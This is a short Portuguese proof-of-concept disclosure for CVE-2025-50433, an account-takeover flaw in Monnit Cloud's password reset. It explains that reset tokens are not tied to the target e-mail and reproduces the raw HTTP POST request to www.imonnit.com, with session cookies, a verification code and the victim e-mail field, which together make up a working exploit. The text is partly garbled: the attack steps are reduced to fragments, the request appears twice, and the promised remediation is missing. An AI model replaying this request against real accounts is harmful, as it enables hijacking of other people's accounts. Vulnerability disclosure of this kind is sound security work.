
Prova de conceito para uma tomada de conta crítica no Monnit Cloud (CVE-2025-50433), explorando a ausência de validação token-e-mail na redefinição de senha e fornecendo etapas de ataque, causa raiz e remediação.
Existe uma vulnerabilidade crítica de autenticação em *.imonnit.com que permite a apropriação total de conta (ATO) em qualquer conta de usuário sem interação da vítima.
O backend não valida a associação entre o token de redefinição de senha e o e-mail alvo, permitindo que atacantes usem seu próprio token de redefinição válido para redefinir a senha de qualquer conta de vítima.
[email protected]).[email protected]). POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
Host: www.imonnit.com
Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
__RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
Host: www.imonnit.com
Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
__RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
CVSS 3.1: 9.8 (Crítica)
Vetor: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
*.imonnit.com
O endpoint de redefinição de senha não valida se o token de redefinição pertence ao mesmo e-mail fornecido durante a operação de redefinição, permitindo redefinições arbitrárias de senha usando tokens controlados pelo atacante.
/Account/PasswordReset/
Fornecedor: Monnit Corporation
Mohamed Mandor (0xmandor) GitHub: https://github.com/0xmandor